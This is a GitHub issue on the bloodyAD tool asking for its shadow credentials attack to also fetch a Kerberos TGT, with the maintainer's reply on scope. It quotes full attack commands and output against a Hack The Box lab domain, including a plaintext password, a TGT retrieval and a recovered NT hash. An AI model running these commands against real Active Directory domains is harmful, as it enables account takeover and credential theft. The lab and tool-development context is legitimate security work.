Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Enhancement: shadowCredentials #48

Open
0xGreen opened this issue Jun 27, 2024 · 1 comment
Open

Enhancement: shadowCredentials #48

0xGreen opened this issue Jun 27, 2024 · 1 comment
Labels
enhancement New feature or request

Comments

@0xGreen
Copy link

0xGreen commented Jun 27, 2024

Wondering if it is possible to enhance the shadowCredential attack to remove the use of another tool?

bloodyAD -d absolute.htb --host dc.absolute.htb -k -u m.lovegod -p 'AbsoluteLDAP2022!' add shadowCredentials winrm_user
[+] KeyCredential generated with following sha256 of RSA key: 14835400bcc0ed3199d6b17edb829ef94c31fd45379028d3267d13ec6010465c
No outfile path was provided. The certificate(s) will be stored with the filename: FNoxGjcN
[+] Saved PEM certificate at path: FNoxGjcN_cert.pem
[+] Saved PEM private key at path: FNoxGjcN_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem FNoxGjcN_cert.pem -key-pem FNoxGjcN_priv.pem absolute.htb/winrm_user FNoxGjcN.ccache

So, the attack is a success but need another tool PKINITtools to get the TGT.

If it is possible to implement something like what certipy did would be awesome, it perform the same attack and provide TGT. (In the past, i guess PKINITtools was required for certipy as well)

certipy shadow auto -target dc.absolute.htb -account winrm_user -k -u [email protected] -p 'AbsoluteLDAP2022!'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7'
[*] Adding Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
@CravateRouge
Copy link
Owner

bloodyAD is specialized in Active Directory attacks while certipy is specialized in AD certificate attacks. That's why bloodyAD only do the first part of the exploit by writing into the AD and lets the kerberos part to another tool specialized for it.

But if you want to add this feature feel free to add it. I would ask you not to include more dependencies than what bloodyAD already has (so no impacket dependency, only minikerberos).

@CravateRouge CravateRouge added the enhancement New feature or request label Oct 28, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement New feature or request
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@0xGreen @CravateRouge